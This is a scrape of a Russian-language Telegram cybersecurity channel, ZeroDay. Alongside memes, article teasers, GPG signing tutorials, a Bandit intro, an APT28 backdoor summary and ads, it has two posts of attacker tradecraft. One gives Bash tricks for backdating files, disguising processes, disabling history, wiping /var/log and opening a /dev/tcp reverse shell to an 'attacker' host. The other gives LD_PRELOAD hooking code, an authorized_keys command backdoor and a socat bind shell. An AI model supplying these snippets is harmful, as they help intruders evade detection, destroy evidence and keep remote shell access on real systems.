ZeroDay | Кибербезопасность
44.5K subscribers
564 photos
5 videos
8 files
744 links
Ваш учебник по кибербезопасности

Реклама - @bashmak_media

https://telega.in/c/cybersec_academy

РКН: https://vk.cc/cHYqeq
Download Telegram
Ваш антивирус смотрит за тем, как вы отключаете его, чтобы запустить keygen.exe

ZeroDay | #мем
😁62🤣359👏1💘1
Корреляция без SIEM: универсальный движок в действии

Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.

В статье показывают 7 примеров, где такой механизм реально работает: скоринг пользователей в UEBA, макрокорреляции для SOC, прогнозирование рисков в SGRC и даже контроль в АСУ ТП. Один и тот же инструмент, но для разного.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍2❤‍🔥1💘1
Bandit: быстрый поиск уязвимостей в Python-коде

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Bandit — классная утилита для поиска уязвимостей в Python-коде.
Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.

Python сегодня, очевидно, один из самых популярных языков, а значит и уязвимости в коде на нём часто становятся точкой входа для атак. Bandit может ловить проблемы ещё на этапе разработки или CI/CD. Утилита легко встраивается в пайплайн (pre-commit hooks, GitHub Actions, GitLab CI и пр.) и формирует отчёты в разных форматах — от JSON до HTML.

Быстрый старт:
Установка через pip:

pip install bandit


Проверка всего проекта:

bandit -r ./my_project


Или проверка конкретного файла:

bandit my_script.py


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤‍🔥43
This media is not supported in your browser
VIEW IN TELEGRAM
5 фишек Bash для скрытности

👋 Приветствую в мире цифровой безопасности!

Давай расскажу о 5 фишках Bash для того, чтобы работать тише.


Подделка времени файлов: Чтобы файл не выделялся среди новых, можно «состарить» его:

touch -r /bin/ls hack.sh
touch -t 201801010101.01 hack.sh


Так скрипт выглядит как старый системный.

Маскировка процессов: В ps любой увидит ваш процесс. Но можно «притвориться»:

exec -a "[kworker/0:1H]" ./evil.sh
echo "httpd" > /proc/$$/comm


Теперь скрипт похож на системный или веб-сервер.

Работа без истории: Чтобы команды не остались в ~/.bash_history:

HISTFILE=/dev/null
set +o history
history -c && history -w


Алиасы для скрытности: Подменяем стандартные команды:

alias ls='ls --hide=hack.sh'
alias vanish='rm -rf ~/.bash_history /var/log/*'


Первое прячет файлы, второе - убирает следы.

Скрытый сетевой трафик: Обратный шелл можно завуалировать под HTTPS:

bash -i >& /dev/tcp/attacker/443 0>&1


Трафик пойдёт через порт 443, что выглядит в принципе привычно.

ZeroDay | #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥228😱2😁1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.


LD_PRELOAD для подмены системных вызовов: Если у вас есть возможность писать в /tmp, можно внедрить свою библиотеку. Например, перехватить вызов open() и переправить его в свой файл. Создаём evil.c:

#include <stdio.h>
#include <dlfcn.h>
#include <fcntl.h>

int open(const char *path, int flags, ...) {
static int (*orig_open)(const char*, int, ...) = NULL;
if (!orig_open) orig_open = dlsym(RTLD_NEXT, "open");
if (strstr(path, "shadow")) return orig_open("/etc/passwd", flags);
return orig_open(path, flags);
}


➡️ Собираем: gcc -fPIC -shared -o evil.so evil.c -ldl
➡️ Запускаем: LD_PRELOAD=./evil.so target_binary

SSH-ключи без пароля: Многие забывают, что authorized_keys поддерживает опции. Можно добавить туда ключ с хитрым префиксом:

command="/bin/bash -i" ssh-rsa AAAAB3...


Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».

Socat как универсальный биндер: Иногда на цели нет nc, а нужен обратный шелл или проброс. Socat поможет тут:

socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash


Или проброс порта с шифрованием:

socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:localhost:22


ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍135
Новая атака группы APT28 на компании в странах НАТО

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём кампанию российской группировки APT28, нацеленную на компании в странах НАТО.

NotDoor - что это: VBA-бэкдор для Outlook, который следит за входящей почтой и ждёт «триггерного» письма. Как только оно приходит, хакеры могут забирать файлы, слать данные и выполнять команды на вашей машине. Название связано с тем, что в коде часто встречается слово “Nothing”.

Как он попадает в систему: через OneDrive с хитрой техникой DLL side-loading. Запускается DLL (SSPICLI.dll) и сразу отключает защиту макросов. Дальше PowerShell-команды шифруют данные, создают устойчивость через реестр и делают всё максимально незаметно.

Что делает внутри: VBA слушает события Outlook (MAPILogonComplete и NewMailEx), создаёт папку %TEMP%\Temp для временных файлов и отсылает их на Proton Mail. Письма с триггером, например «Daily Report», заставляют выполнять встроенные команды.

Какие команды умеет: cmd - выполнить команду и прислать результат, cmdno - выполнить тихо, dwn - украсть файлы, upl - загрузить файлы на машину жертвы.

Скрытность и фишки: хакеры используют Microsoft Dev Tunnels и Telegram для скрытой связи с C2, ротацию доменов через Cloudflare Workers, маскируют трафик под обычные сервисы - почти полностью «невидимы».

ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍159👎4🤔2🔥1
Корпоративный прокси в одной фото 😁

ZeroDay | #мем
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁50🤮16🤣115💋3
Свой мессенджер вместо MAX: Matrix и XMPP на домашнем сервере

В какой-то момент автор статьи понял, что звонить по мобильной сети в 2025 году - это уже моветон: качество хуже, чем в VoIP, а про безопасность и говорить нечего. Популярные мессенджеры вроде Telegram и WhatsApp тоже не вариант: либо риски утечки, либо странные ограничения. А вот MAX у него вообще отказался запускаться - и ладно.

В статье рассказывается, как на своём сервере автор развернул два конкурирующих протокола - Matrix (Synapse) и XMPP (Ejabberd) - и сравнил их на практике. Пошагово показано разворачивание в Docker с Portainer, объясняется, зачем нужен Coturn для звонков, и какие клиенты удобнее в реальной жизни (спойлер: родители тоже тестировали).

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22😁124🤡2👍1💘1
📝 Типы атак на пароли

Browser Autofill Exploit — извлечение сохранённых паролей из автозаполнения браузера.

Brute Force Attack — перебор всех возможных комбинаций символов до нахождения правильного пароля.

Credential Stuffing — использование украденных логинов и паролей из одной утечки для доступа к другим сервисам.

Dictionary Attack — подбор пароля из заранее составленного списка распространённых слов.

Hash Collision Attack — использование слабостей хэш-функций для подбора разных данных с одинаковым хэшем.

Keylogging — запись нажатий клавиш, чтобы перехватить пароль в момент ввода.

Man-in-the-Middle Attack — перехват трафика между пользователем и сервисом для кражи учётных данных.

Password Spraying — проверка нескольких популярных паролей сразу на множестве аккаунтов, чтобы избежать блокировок.

Phishing Attack — обман через поддельные сайты или письма, чтобы выманить пароль у жертвы.

Rainbow Table Attack — использование заранее вычисленных таблиц для расшифровки хэшей паролей.

Shoulder Surfing — подсмотр пароля через плечо или с помощью камер.

Social Engineering — манипуляции с человеком, чтобы заставить его выдать пароль добровольно.

ZeroDay | #атака
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍5❤‍🔥3😁1
Киберустойчивость: как бизнес выживает во время атак

👋 Приветствую в мире цифровой безопасности!

— «Вы точно выдержите кибератаку?»
— «А если система ляжет, что будет с нашими данными?»

Такие вопросы сегодня звучат постоянно. Простое «у нас есть защита» уже не успокаивает - бизнесу важно видеть реальную готовность компании выстоять под атаками. Тут на первый план выходит киберустойчивость - умение продолжать работу даже в случае атаки или сбоя.

От CISO ждут не стопки отчётов, а прямого ответа: где настоящие риски и как они бьют по бизнесу.

В Innostage, где, помогают бизнесам строить киберустойчивость, подход строится на трёх принципах:
1️⃣Измеримость — от «недопустимых событий» до Индекса защищённости.
2️⃣Управляемость — понятная логика решений, а не хаос.
3️⃣Финансовая привязка — разговор на языке бизнес-рисков и затрат.

В итоге киберустойчивость уже не дело одного ИБ, а часть стратегии: помогает контролить риски, принимать решения и показывать клиентам и партнёрам, что компании вполне можно доверять.

📅 Об этом будут говорить профи и эксперты на Kazan Digital Week 17–19 сентября.

ZeroDay | #cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
84👍2👨‍💻2👎1🔥1
Sliver — кроссплатформенный фреймворк для Red Team

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Что это: кроссплатформенный фреймворк для эмуляции атак. Работает на Windows, Mac и Linux, а его импланты подстраиваются под вашу цель.

А вот что умеет: он генерирует код за секунды, прячет его при компиляции, работает с staged и stageless payloads. Также тут безопасная связь с сервером через mTLS, WireGuard, HTTP(S) и DNS. Можно скриптить на Python или JS/TS, мигрировать процессы, делать инъекции, манипулировать токенами, разворачивать TCP и named pipe pivot, запускать .NET сборки прямо в памяти… и это только часть.

Зачем нужен: чекнуть, где ваша защита слабая, потренировать команду реагирования и посмотреть, как настоящие Red Team обходят системы, не ломая ничего критичного.

Быстро стартуем:

git clone https://github.com/BishopFox/sliver.git
cd sliver
make
./sliver-server
./sliver-client


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17💘21
Вам — защита от блокировок, нам — анализ рисков и транзакций 💙

Заблокировали из-за «грязной» крипты? Вы не одиноки — только в 2024 году 1500+ российских компаний прошли через заморозку счетов. Регулятору нужны не оправдания, а цифры и факты.

⚡️ Но решение есть!

КоинКит ПРО — первый в России инструмент, который показывает не просто тип источника (биржа, обменник, даркнет), а точные суммы от каждой конкретной площадки. Больше никаких догадок — только факты.

Как это работает:
✔️ Теперь ваши доказательства выглядят так:
🟢Binance — 1000 USDT
🟡Uniswap — 500 USDT
🔴Tornado Cash — 500 USDT
Вы будeте знать все конкретные площадки, с которыми взаимодействует ваш контрагент.

✔️ Получайте отчет, адаптированный под российские реалии и санкционные риски. Больше не нужно собирать доказательства вручную;

✔️ Контролируйте свои риски еще детальнее, точечно настраивая допустимые риски на кошельке с API-интеграцией.


🔥 Принимайте безопасные решения — получите демо-доступ к КоинКит ПРО, перейдя по ссылке.

Реклама ООО «КоинКит» ИНН 9724089320 coinkyt.com
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6🤡21
This media is not supported in your browser
VIEW IN TELEGRAM
Все тонкости GPG-подписей

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём, что такое GPG-подписи и зачем они нужны вообще.

Что это: GPG-подпись - это способ доказать, что файл или сообщение действительно отправил тот, кто его подписал, и что его не подменили по пути. По сути, это как цифровая подпись на бумажном документе, только для файлов и писем. Даже если кто-то перехватит файл, подделать подпись без приватного ключа невозможно.

Подпись файлов:

1️⃣Создаём ключ:

gpg --full-gen-key


Выбираем RSA 4096, срок действия, имя и почту. GPG попросит немного случайных действий (печать, движения мышкой), чтобы ключ был «живым».

2️⃣Подписываем файл:

gpg --sign -u [email protected] msg


Файл msg.gpg теперь содержит ваше сообщение + подпись.

3️⃣Красивый ASCII-формат:

gpg --armor --sign -u [email protected] msg


Или вариант для людей — clear-sign, где сообщение остаётся читаемым:

gpg --clear-sign -u [email protected] msg


Detached signatures: подпись в отдельном файле, если не хотите смешивать её с сообщением:

gpg --detach-sign -u [email protected] msg
gpg --armor --detach-sign -u [email protected] msg


Проверяем так:

gpg --verify msg.asc
gpg --verify msg.asc msg


Если кто-то изменит хотя бы один символ, GPG сразу скажет, что подпись плохая.

Проверка чужих подписей:

gpg --import key.pub
gpg --verify msg.asc


GPG проверит подпись, но предупредит, если ключ не доверенный. Подпись будет валидной, но доверять ей - решать вам.

ZeroDay | #GPG
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
Какой метод используют продвинутые вредоносы для скрытой автозагрузки без записи в автозагрузку Windows?
Anonymous Quiz
28%
Планировщик заданий
35%
Изменение реестра HKCU\Run
9%
Создание ярлыка в папке Startup
29%
Установка службы через sc.exe
👍4🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
GPG: подписи и доверие к ключам
Часть 2

👋 Приветствую в мире цифровой безопасности!

В прошлый раз мы говорили о GPG-подписях для файлов. В этот раз обсудим, как работает доверие к ключам.

Слепо доверять нельзя: Представим: Боб отправляет Алисе свой ключ, но посередине сидит Ева. Она может подделать ключ и «заменить» его на свой. Когда Боб пришлёт сообщение, Ева сможет подписать его своим ключом, и Алиса ничего не заметит. Так что просто скачать чужой ключ и довериться ему - ну так себе идея.

Web of Trust - сеть доверия: Вместо централизованных сертификатов (как в HTTPS) GPG использует Web of Trust. Смысл прост: ты доверяешь подписям людей, которым доверяешь сам.

Уровни доверия к подписям:
➡️Не знаю или не буду отвечать
➡️Не доверяю
➡️Доверяю ограниченно (для полноценного доверия нужно несколько таких подписей)
➡️Полностью доверяю (одной подписи достаточно)
➡️Абсолютно доверяю (только для твоего ключа)

Пример на практике: У Алисы и Боба есть ключи друзей, и они могут проверить ключи друг друга через общих знакомых, подписать чужие ключи и обменяться подписанными ключами. Теперь никакая Ева им не страшна: подделка одной подписи не даст ей обмануть сеть.

Подписываем чужой ключ

gpg --edit-key [email protected]
gpg> sign -u Alice
gpg> save


После этого проверка подписи файла покажет доверие:

gpg --verify msg.asc


Если всё сделано правильно - подпись валидна и доверие подтверждено.

Проверка реального файла

wget https://github.com/szaffarano/wofi-power-menu/releases/download/v0.3.1/wofi-power-menu-linux-x64
wget https://github.com/szaffarano/wofi-power-menu/releases/download/v0.3.1/wofi-power-menu-linux-x64.asc
gpg --recv-keys 42BE68F43D528467FC281E2E310FFE86A2E427BA
gpg -u David --lsign-key 42BE68F43D528467FC281E2E310FFE86A2E427BA
gpg --verify wofi-power-menu-linux-x64.asc


ZeroDay | #GPG
Please open Telegram to view this post
VIEW IN TELEGRAM
12👍5
This media is not supported in your browser
VIEW IN TELEGRAM
👋 Приветствую в мире цифровой безопасности!

Сделал для вас новую подборку крутых бесплатных курсов по ИБ и не только на YouTube.

Кибербезопасность 2025
Огромный курс по кибербезу нуля до про
Кибербез от Касперского
Белый хакинг
Плейлист по OSINT

ZeroDay | #Подборка
Please open Telegram to view this post
VIEW IN TELEGRAM
143👍1
«Если ты знаешь сеть и знаешь себя, тебе не страшны результаты сотни окон обслуживания.»

Искусство WAN
Сунь-Цзы (наверное)

ZeroDay | #мем
31😁13👍2💯1
Deep-dive, или когда обновиться недостаточно

Обновление библиотеки - первое, что советует SCA-отчёт. Но что делать, если патча нет, обновление ломает совместимость или уязвимость - мнимая? В таких случаях можно уже нужно копать глубже: читать CVE, смотреть код, проверять, реально ли приложение вызывает уязвимый путь, и думать про обходные меры.

В статье будет краткий чек-лист Deep-dive: верификация SCA, поиск первоисточников, оценка эксплуатируемости и практические обходы (конфиги, мониторинг, тестовая эксплуатация). Кейсы на Spring/Struts и Python показывают, как решать прям на практике.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🏆1
😁53🤣142🔥2💯2